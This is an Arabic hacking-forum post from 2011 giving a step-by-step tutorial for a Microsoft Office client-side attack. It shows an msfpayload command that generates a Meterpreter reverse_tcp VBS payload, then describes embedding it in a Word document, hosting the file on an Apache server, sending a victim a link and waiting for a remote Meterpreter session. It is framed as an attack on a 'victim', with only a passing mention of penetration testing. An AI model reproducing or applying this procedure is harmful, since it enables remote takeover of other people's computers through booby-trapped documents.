التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-14-2011, 06:59 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية spid3rnet
 

 

 
إحصائية العضو







spid3rnet غير متواجد حالياً

إرسال رسالة عبر MSN إلى spid3rnet

 

 

إحصائية الترشيح

عدد النقاط : 10
spid3rnet is on a distinguished road

.... office client side attack


هده طريقة لاختراق الحواسيب عن طريق ملفات ال Microsoft office

لرؤية الشرح بالصورة و الصوت مباشرة هنا

http://blip.tv/jac0bn3t/office-files...cripts-5370003

للتحميل الشرح هنا

http://blip.tv/file/get/Jac0bn3t-off...Scripts859.mp4



بعد رؤية الشرح المرجو قراءة هدا الموضوع

ما قمت باستخدامه :

samba
client

metasploit

OS:backtrack 5 linux and Win SP2 and SP3

Microsoft office word 2003

camtasia video recording and editing

سنقسم الشرح الى خطوتين:

الخطوة الأولى:اعداد الباكدوور و تلغيمه

سوف احتاج الى Win XP helper maching and Microsoft office للعمل حقن لملف (doc.)

كيف سنقوم بالحقن *:

سنعد Visual basic script عن طريق Metasploite باستعمال ال Command

التالية:

msfpayload windows/meterpreter/reverse_tcp lhost=0.0.0.0
lport=8080 -e shakita_ga_nai V

تم وضعنا ال Visual basic script في ملف VBS.txt في

/var/www/vbs.txt

سوف تتسألون لمادا وضعنها في هدا الملف /var/www

هدا الملف خاص بالوب لتكون مشاطرة Visual basic script

سهلة بين ال backtrack 5 و Win XP helper maching

بحيت قمت ببدأ apache2 server

و أصبح الملف VBS.txt
الذي فيه ال Visual basic script قابل للتحميل من أي حاسوب

بعد تلغيم الملف (.doc) الدي سميته backdoor(لتسهيل الشرح)

كيف تم التلغيم الملف الشرح في الفيديو من الدقيقة 6:00 إلى 7:16

علما ان ال Port :445 مفتوحة على ال Win XP helper maching قمت بوضع ملف الملغم backdoor.doc

في ملف منقسم مع ال Network أي *.*.192.168

وإ ستعملت ال samba client من اجل الدخول إلى الملف المقاسم تم قمنا بعمل
cp
أي copier coler للملف الملغم الى var/www/backdoor.doc

من اجل مشاطرته مع الضحية

قمنا بإرسال رسالة الى الضحية مع IP الخاصة بال apache2 server

قمنا بعمل listining بال metasploite

لل Port and ip لقمنا باستعمالها لإنشاء ال PAYLOAD

و ننتضر الضحية

بعد ان يقرأ الضحية الرسالة و يحمل الملف الملغم و يفته سوف نحصل على meterpreter session

وهدا كل شيء

الموسيقا المستعملة :infected mushrooml-saaed
and
illuson dj markitos



وضعت الدرس في قسم ال penetration testing أيضا لوجود علاقة بين الدرس و ال pentration


office client side attack

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:10 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0